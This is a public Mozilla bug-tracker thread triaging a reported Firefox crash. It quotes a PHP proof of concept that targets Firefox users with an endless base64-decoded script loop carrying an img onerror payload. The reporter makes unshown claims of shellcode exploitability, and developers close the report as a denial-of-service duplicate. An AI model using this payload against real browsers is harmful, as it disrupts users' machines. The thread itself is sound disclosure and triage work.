Closed Bug 822264 Opened 12 years ago Closed 12 years ago

possible exploitable crash

Categories: Core :: DOM: Core & HTML, defect
Priority: Not set
Severity: normal
Tracking: RESOLVED DUPLICATE of bug 817629
People: Reporter: curtisk, Unassigned

reported to sec@
=============//=============
Hi,
I tried this exploit http://1337day.com/exploit/19964 in a fully updated Mozilla browser and it did crash. The problem is that, according to the Immunity Debugger logs, it may be possible for someone to inject shellcode. In case you need anything, contact me to help out. Best regards,
Mavrofidis Manolis

-- 
A drop of water hollows the stone by persistence.
http://0x109.tuxfamily.org

=============//=============
copied script from quoted site
=============//=============

<!DOCTYPE html>
<html>
<body>
<?php
/* Mozilla Firefox HTML/JS DOS Vulnerability - POC by Sergio Yoshikata - @sergioyoshiman
Base64  encoded exploit "/><script>while(true){document.write ('"><img src=x onerror=alert(2)>/foobar');}</script>*/
$exploit= 'Ii8+PHNjcmlwdD53aGlsZSh0cnVlKXtkb2N1bWVudC53cml0ZSAoJyI+PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDIpPi9mb29iYXInKTt9PC9zY3JpcHQ+';
//check if victim is Using Mozilla Firefox
$firefox = strpos($_SERVER["HTTP_USER_AGENT"], 'Firefox') ? true : false;
if ($firefox)
{
//loop forever
while(1) {
//print exploit code infinite times.
print(base64_decode($exploit));
}
}
?>
</body>
</html>
# 1337day.com [2012-12-17]
Flags: sec-bounty?
What are "immunity debugger logs"? This is a DOS in the most obvious form. Do they have crash report IDs?
Immunity Debugger "logs" are not logs; it is a word I used to avoid mentioning everything about the CPU registers, the heap, the stack, etc. I did set up Immunity Debugger (later referred to as dbg) as the just-in-time debugger. Well, according to dbg and the information it revealed about the Firefox crash, the registers and the heap allocation show a potential exploit out of this DOS vulnerability. As of this time, I haven't been able to build a stable exploit; I guess it needs some egg-hunting shellcode and I don't have sufficient time for this now. I may be attaching the Firefox JS engine in the debugger for more information about the subject.

Best regards,
Manolis
Can you just provide a regular crash ID or a stack trace?
Flags: needinfo?(mmavrofides)
We are getting multiple reports of this same code from various sources. I suspect that there is a site that has this code and we are just now getting informed of these.
http://pastebin.com/SigzqudB

Title : Mozilla Firefox HTML/JS DOS Vulnerability - POC
Version : Mozilla Firefox Beta Version and Normal 17.0.1
Date : 2012-12-06
Vendor : http://www.mozilla.org
Impact : Medium
Contact : sergioyoshiman [at] gmail.com
Twitter : @sergioyoshiman
tested : windows XP SP3 & Windows 7 SP1
Author : Sergio Yoshikata - Lima , Peru
==============================================================
Mozilla Firefox JS POC
"/><script>while(true){document.write ('"><img src=x onerror=alert(2)>/foobar');}</script>
There is a site with the PoC; I already included it in my mail. I'll get back to you with a Crash ID and a trace in a couple of hours. I have a class now, so bear with me :)
Flags: needinfo?(mmavrofides)
Btw, it is being heavily distributed on a lot of sites such as 1337day.org and the rest of the exploit databases, beyond the pastebin and http://1337day.com/exploit/19964 . Full disclosure is the case here.
It is being reported as a DOS. If you have information that this is exploitable, I haven't seen that publicly reported yet and I'd like to keep this closed until we know for sure.
Group: core-security
Group: mozilla-corporation-confidential, core-security
Group: mozilla-corporation-confidential
I already told you before, I have built an exploit that doesn't work at the time under Windows 7 (ASLR,DEP bypass is not implemented) and exploits the same vulnerability* that makes Firefox crash. I won't be giving the exploit. If I was to give the exploit, I'd build a stable one and then I'd sell it in the market and get some cash.

Don't make the same mistakes other vendors do. Just patch the hole and if the exploit still works, I'll let you know with the exploit included.

Best regards, 
Manolis

PS: The DoS is confirmed. The exploit works on OSes that don't have built-in protections such as ASLR, DEP, etc. I'll be adding the crash ID in ten minutes, hopefully.
The code here is identical to bug 817629, down to the alert(2) bit.

As I said in that bug, as far as I can tell this is not a security issue other than DoS, and is a duplicate of known non-security bugs. I'll be happy to be proved wrong, of course!
(In reply to Manolis Mavrofidis from comment #11)
> I already told you before, I have built an exploit that doesn't work at the
> time under Windows 7 (ASLR,DEP bypass is not implemented) and exploits the
> same vulnerability* that makes Firefox crash. I won't be giving the exploit.
> If I was to give the exploit, I'd build a stable one and then I'd sell it in
> the market and get some cash.

You don't need an exploit to bypass ASLR/DEP to earn some bug bounty cash from us, but we do need to see something more than resource exhaustion.
OK, I'll dig into the subject further, build a stable exploit, and file a new report with the exploit and/or further bugs that I may find during the exploration. Happy XMAS holidays everyone, and guys, fix the bug :)
Manolis.
Status: UNCONFIRMED → RESOLVED
Closed: 12 years ago
Resolution: --- → DUPLICATE
Triage: opening this up.
Group: core-security
Flags: sec-bounty? → sec-bounty-
Component: DOM → DOM: Core & HTML